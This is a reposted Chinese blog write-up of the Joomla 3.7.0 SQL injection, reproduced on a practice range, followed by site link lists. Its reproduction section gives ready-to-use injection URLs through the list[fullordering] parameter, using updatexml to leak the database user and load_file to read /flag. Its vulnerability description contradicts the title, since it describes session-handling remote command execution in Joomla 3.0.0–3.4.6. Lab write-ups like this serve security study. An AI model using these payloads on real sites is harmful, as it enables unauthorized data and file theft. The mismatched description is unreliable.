Joomla 3.7.0 SQL注入漏洞

其他 2021-12-13 13:26:20 阅读次数: 0

Joomla 3.7.0 SQL注入漏洞

漏洞描述：

漏洞本质是Joomla对session数据处理不当，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，获取服务器权限，实现远程命令执行。

影响范围：

Joomla 3.0.0-3.4.6

环境搭建：

这里采用安鸾渗透实战地址

漏洞复现：

打开之后页面

安装完成后，构造payload

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

看到返回了用户

构造读取文件的payload

0x2f666c6167是/flag得hex编码

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)

得到flag

漏洞修复：

升级最新版完整安装包以及升级补丁包

猜你喜欢

转载自blog.csdn.net/qq_48985780/article/details/121654759

Joomla 3.7.0 SQL注入漏洞

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

Joomla漏洞

Joomla对象注入漏洞分析

CMS Joomla SQL注入漏洞练习（CVE-2017-8917 ）

Joomla漏洞利用

Joomla 漏洞总结

Joomla

Joomla3.4.6 RCE漏洞深度分析

Joomla 3.4.6 Remote Code Execution漏洞复现

Joomla反序列化漏洞

Joomla 3.8.10 发布，修复 Windows 自动加载器漏洞

墨者学院 - Joomla插件漏洞分析溯源

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

Joomla 3.4.6 远程代码执行漏洞复现分析

Joomla 3.4.6远程代码执行漏洞原理分析和poc

Joomla 3.4.5 反序列化漏洞复现

Joomla-3.4.6远程代码执行漏洞利用与分析

Joomla存在未授权访问漏洞CVE-2023-23752

CVE-2023-23752 Joomla未授权访问漏洞分析

Joomla接触

joomla 试用

【漏洞复现】Joomla未授权访问漏洞(CVE-2023-23752)

注入漏洞-sql注入

bolt cms V3.7.0 xss和远程代码执行漏洞

Joomla 3.9.13 二次注入分析（CVE-2019-19846）

Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）

Joomla目录遍历导致RCE漏洞复现（CVE-2021-23132）

【漏洞汇总】SQL 注入漏洞

(SQL)注入漏洞修复

今日推荐

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

【转】spring中对控制反转和依赖注入的理解

tms webcore 安装和使用

java程序员进阶相关书籍

SpringMVC接受请求参数、

如何保存训练好的机器学习模型

MyEclipse、Eclipse设置项目JDK的三个地方

商超行业微信小程序开发定制一般多少钱（行业技术人员解读）

Markdown编辑器语言——30分钟入门到到精通

Linux系统下MongoDB的简单安装与基本操作

Power Strings

每日归档

更多

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)